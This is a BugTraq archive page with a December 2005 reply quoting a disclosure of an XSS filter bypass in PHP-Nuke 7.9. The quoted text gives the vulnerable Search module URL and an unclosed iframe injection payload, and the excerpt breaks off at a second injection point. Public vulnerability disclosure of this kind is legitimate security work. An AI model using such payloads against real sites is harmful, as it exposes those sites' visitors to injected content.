Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Re: Bypass XSS filter in PHPNUKE 7.9=>x Dec 17 2005 01:21AM
Paul Laudanski (zx castlecops com)
On 14 Dec 2005 max (at) jestsuper (dot) pl [email concealed] wrote:

> [Bypass XSS filter in PHPNUKE 7.9=>x cXIb8O3.21]
>
> 2.0 http://[HOST]/[DIR]/modules.php?name=Search
>
> Insert:
>
> <iframe src=http://securityreason.com?phpnuke79 <
>
> And have you xss.
>
> 2.1 http://[HOST]/[DIR]/modules.php?name=Web_Links
>
> Inse...

[ more ]  




 

Privacy Statement
Copyright 2009, SecurityFocus